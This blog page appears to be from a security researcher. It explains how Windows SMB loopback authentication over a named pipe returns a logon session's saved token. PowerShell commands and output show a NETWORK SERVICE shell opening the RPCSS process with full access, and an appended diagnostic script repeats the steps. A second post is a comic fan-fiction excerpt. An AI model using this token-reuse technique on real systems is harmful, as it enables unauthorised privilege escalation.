Saturday, 25 April 2020
Sharing a Logon Session a Little Too Much
Let's get straight to it: when LSASS creates a Token for a new Logon session, it stores that Token for later retrieval. For the most part this isn't that useful; however, there is one case where the session Token is repurposed: network authentication. If you look at the prototype of AcquireCredentialsHandle, where you specify the user to use for network authentication, you'll notice a pvLogonID parameter. The explanatory note says:
"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."
What does this really mean? Well, if you have TCB privilege when doing network authentication, this parameter specifies the Logon Session ID (or Authentication ID, if you're coming from the Token's perspective) of the Token to use for the network authentication. Normally this isn't that interesting if the network authentication is going to another machine, as the Token can't follow ('ish). However, what about Local Loopback Authentication? In this case it does matter, as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.
Of course, if you have TCB you can do almost whatever you like, so why is this useful? The clue is back in the explanatory note: "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Are there any primitives SMB supports that allow you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!
Note, this is tested on Windows 10 1909; results might vary. First you'll need a PowerShell process running as NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. With that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though, so we could probably run something like Rotten Potato, but we won't. Instead, why not target the RPCSS service process? It also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem with doing that; let's try and open the RPCSS service process.
PS> Get-RunningService "rpcss"
Name Status ProcessId
---- ------ ---------
rpcss Running 1152
PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.
Well, that puts an end to that. But wait, what Token would we get from a loopback authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.
PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }
Next open a handle to the pipe via localhost, and then wait for the job to complete.
PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null
Finally open the RPCSS process again while impersonating the named pipe.
PS> $p = Use-NtObject($pipe.Impersonate()) {
>> Get-NtProcess -ProcessId 1152
>> }
PS> $p.GrantedAccess
AllAccess
How on earth does that work? Remember I said that the Token stored by LSASS is the first Token created in that Logon Session? Well, the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's. We can prove that by opening the impersonation token and looking at the group list.
PS> $token = Use-NtObject($pipe.Impersonate()) {
>> Get-NtToken -Impersonation
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name Attributes
---- ----------
NT SERVICE\RpcSs EnabledByDefault, Owner
Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service, so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.
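To make the effect described above easy to check on a given session, here is an added diagnostic script; it is not part of the original post or of NtObjectManager. It repeats the post's loopback named-pipe steps and then compares the token the pipe server receives with the caller's own primary token, reporting whether the two share a logon session and which groups (such as a service SID) appear only in the loopback token. It assumes the NtObjectManager cmdlets used throughout the post (New-NtNamedPipeFile, Get-NtFile, Use-NtObject, Get-NtToken) are loaded; the function name and the pipe name are arbitrary values chosen for this example.

```powershell
# Added diagnostic, not part of the original post. It repeats the post's
# loopback named-pipe steps and compares the token the pipe server receives
# with the caller's own primary token, so you can see whether the saved
# logon-session token (rather than the caller's) came back.
# Assumptions: the NtObjectManager module used in the post is loaded; the
# function name and pipe name are arbitrary values chosen for this example.
function Test-LoopbackSessionToken {
    param(
        [string]$PipeName = "LoopbackTokenCheck_$PID"
    )

    # The caller's primary token is the baseline for the comparison.
    $callerToken = Get-NtToken -Primary

    # Server end of the pipe. Listen() blocks, so run it on a second
    # in-process runspace; the handle object is passed by reference rather
    # than serialised into a separate Start-Job child process.
    $pipe = New-NtNamedPipeFile "\\.\pipe\$PipeName" -Win32Path
    $ps = [PowerShell]::Create()
    [void]$ps.AddScript({ param($server) $server.Listen() }).AddArgument($pipe)
    $listen = $ps.BeginInvoke()
    $client = $null

    try {
        # Client end via the loopback UNC path, which forces SMB network
        # authentication against the same machine.
        $client = Get-NtFile "\\localhost\pipe\$PipeName" -Win32Path
        [void]$ps.EndInvoke($listen)

        # Token the server sees when impersonating the SMB client.
        $pipeToken = Use-NtObject($pipe.Impersonate()) { Get-NtToken -Impersonation }

        # Groups present in the loopback token but absent from the caller's.
        $callerSids  = $callerToken.Groups | ForEach-Object { $_.Sid.ToString() }
        $extraGroups = $pipeToken.Groups | Where-Object { $_.Sid.ToString() -notin $callerSids }

        $callerId = $callerToken.AuthenticationId.ToString()
        $pipeId   = $pipeToken.AuthenticationId.ToString()

        [PSCustomObject]@{
            CallerUser             = $callerToken.User.Name
            PipeUser               = $pipeToken.User.Name
            CallerAuthenticationId = $callerId
            PipeAuthenticationId   = $pipeId
            SameLogonSession       = ($callerId -eq $pipeId)
            GroupsOnlyInPipeToken  = @($extraGroups | ForEach-Object { $_.Name })
        }
    }
    finally {
        if ($client) { $client.Dispose() }
        $pipe.Dispose()
        $ps.Dispose()
        $callerToken.Dispose()
    }
}

Test-LoopbackSessionToken | Format-List
```

Run it from the shell whose session you want to inspect. When run from a NETWORK SERVICE shell on a system behaving as the post describes, SameLogonSession is true while GroupsOnlyInPipeToken lists NT SERVICE\RpcSs, which is the saved session token showing through; the script only inspects tokens and opens no other process.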
Wednesday, 1 April 2020
Taking a joke a little too far.
Extract from “Rainbow Dash and the Open Plan Office”.
Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of disdain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.